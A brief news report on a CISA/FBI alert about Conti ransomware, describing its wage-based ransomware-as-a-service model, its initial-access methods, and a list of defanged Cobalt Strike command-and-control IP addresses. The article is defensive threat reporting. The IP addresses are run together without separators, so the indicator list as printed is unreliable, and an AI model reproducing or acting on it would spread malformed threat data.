US issues alert on Conti ransomware activity
Earlier this week the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued an alert on the increased use of Conti ransomware.
The agencies revealed they had seen more than 400 attacks on US and international organisations, with actors gaining initial access to networks via spear phishing emails, fake software downloads and malicious Microsoft Word documents that contain malware.
While Conti is considered a ransomware-as-a-service (RaaS) model, it is noted that this model operates differently to others. It is reported that developers pay the deployers of the ransomware a wage, rather than a percentage of the proceeds from ransom payments.
Conti actors often gain initial access to networks through:
- Spearphishing campaigns using tailored emails that contain malicious attachments or malicious links ;
- Malicious Word attachments often contain embedded scripts that can be used to download or drop other malware—such as TrickBot and IcedID, and/or Cobalt Strike—to assist with lateral movement and later stages of the attack life cycle with the eventual goal of deploying Conti ransomware.
- Stolen or weak Remote Desktop Protocol (RDP) credentials.
- Phone calls;
- Fake software promoted via search engine optimization;
- Other malware distribution networks (e.g., ZLoader); and
- Common vulnerabilities in external assets.
Artifacts leaked with the playbook identify four Cobalt Strike server Internet Protocol (IP) addresses Conti actors previously used to communicate with their command and control (C2) server.
162.244.80[.]23585.93.88[.]165185.141.63[.]12082.118.21[.]1
Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.